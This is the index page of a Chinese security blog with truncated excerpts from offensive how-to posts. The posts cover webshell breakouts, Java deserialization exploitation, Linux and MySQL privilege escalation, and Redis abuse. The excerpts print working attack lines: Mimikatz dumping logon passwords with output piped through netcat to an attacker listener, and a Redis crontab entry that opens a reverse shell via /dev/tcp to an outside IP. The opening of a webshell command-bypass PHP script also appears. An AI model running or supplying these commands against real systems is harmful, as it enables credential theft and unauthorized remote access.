PentestBox 一款Windows平台开源渗透测试

   
分类:安全 | 2016-12-6 | 撸过 2,978 次
0人扯蛋

PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境为什么又有一个渗透测试环境?

PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。我们发现超过50%的渗透测试发行版是运行在Windows系统下的虚拟机程序中,这激发我们创造了它。

[ 源代码]

特性

易于使用

只是一个简单的命令行工具。group设计简洁

不同于传统的绿字黑色背景终端。flash_on性能卓越

直接运行在主机上而不依赖于虚拟机[......]

继续阅读

星外虚拟主机跨web目录文件读取技巧

   
分类:安全 | 2016-11-7 | 撸过 2,911 次
0人扯蛋

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
 
c:\windows\7i24IISLOG2.exe
 
c:\windows\7i24IISLOG3.exe
 
c:\windows\7i24IISLOG4.exe
 
c:\windows\7i24tool.exe
 
c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParser,LogParser是一[......]

继续阅读

Java反序列化利用工具 -- Java Deserialization Exp Tools

   
分类:工具 | 2016-11-5 | 撸过 10,603 次
2人扯蛋

Java反序列化漏洞已经被曝出一段时间了,本人参考了网上大神的放出来的工具,将Jboss、Websphere和weblogic的反序列化漏洞的利用集成到了一起。FreeBuf上已经公开了JBoss反序列化执行命令回显的工具,在本文中就不多做叙述了。其实,WebSphere的利用过程也和JBoss差不多,只不过在发送Payload和解析结果的时候多了个Base64编码(解码)的过程。
本工具暂时支持的功能:
1、本地命令执行并回显,无须加载外部jar包,支持纯内网环境检测。
2、支持JBoss、WebSphere和Weblogic的反序列化漏洞检测。
3、支持https数据传输。
4、[......]

继续阅读

Mimikatz 使用小技巧

   
分类:安全 | 2016-10-6 | 撸过 7,259 次
0人扯蛋

1.记录 Mimikatz输出:

C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

2.将输出导入到本地文件:

C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

3.将输出传输到远程机器:
Attacker执行:

E:\>nc -lvp 4444

Victim执行:

C:\>mi[......]

继续阅读

当webshell不可执行cmshell时 (菜刀的安全模式!)可用此脚本突破执行cmd命令

   
分类:安全 | 2016-10-6 | 撸过 9,597 次
4人扯蛋
<?php

/*
==============
*/

error_reporting(0);
ini_set('max_execution_time',0);


// ------------------------------------- Some header Functions (Need to be on top) ---------------------------------\

/**************** Defines *********************************/

$user = "anlfi";[......]

继续阅读

linux 提权 实战Linux下三种不同方式的提权技巧

   
分类:安全 | 2016-10-3 | 撸过 9,186 次
3人扯蛋

介绍:

渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhub下载。

 

实验一:利用Linux内核漏洞提权

VulnOS version 2是VulHub上的一个Linux提权练习,当打开虚拟机后,可以看到
[......]

继续阅读

redis利用姿势收集

   
分类:安全 | 2016-09-25 | 撸过 4,843 次
0人扯蛋

redis的exploit,完全不需要flushall破坏数据场景,redis-cli set 1 ‘ringzero’,这样可以控制第一条记录,就能保证你的内容始终保持在最前面;

测试环境:CentOS,RHEL

# 利用crontab反弹shell

redis-cli flushall 
echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/114.114.114.114/53 0>&1\n\n"|redis-cli -x set 1 
redis-cli config set dir /var/spool/c[......]

继续阅读

Linux_Exploit_Suggester — Linux下提权辅助工具

   
分类:安全 | 2016-09-24 | 撸过 3,380 次
0人扯蛋

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具,如果不带任何参数运行该脚本的话,将执行uname -r返回的操作系统发行版本,或者手工输入-k参数查找指定版本号。

例子:

$ perl ./Linux_Exploit_Suggester.pl -k 3.0.0

Kernel local: 3.0.0

Possible Exploits:
[+] semtex
   CVE-2013-2094
   Source: www.exploit-db.com/download/25444/‎
[+] memodipper[......]

继续阅读

Windows-Exploit-Suggester --- Windows下提权辅助工具

   
分类:安全 | 2016-09-24 | 撸过 4,055 次
0人扯蛋

此工具是一款非常好用的Windows下提权辅助工具(已经支持Windows 10下的提权了),国内已经有许多人在用了,但是一直没有相应的中文文档,所以我特地翻译了一下,水平有限,如有错误,欢迎指出,谢谢。

描述

该工具可以将目标系统的补丁安装情况与微软的漏洞数据库进行对比,进而检测出目标系统中潜在的未修复漏洞。同时此工具还会告知用户针对于此漏洞是否有公开的exp和可用的Metasploit模块。

同时它可以使用–update参数去自动化地从微软下载漏洞补丁数据库,并将其以Excel表格的形式保存。

需要注意的是,此工具首先会假定目标系统存在所有漏洞,然后再基于系统补丁情[......]

继续阅读

MYSQL提权总结

   
分类:安全 | 2016-07-16 | 撸过 5,236 次
0人扯蛋

最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。
一、利用mof提权

前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day),剑心牛对MOF利用进行了分析,如下:
Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式[......]

继续阅读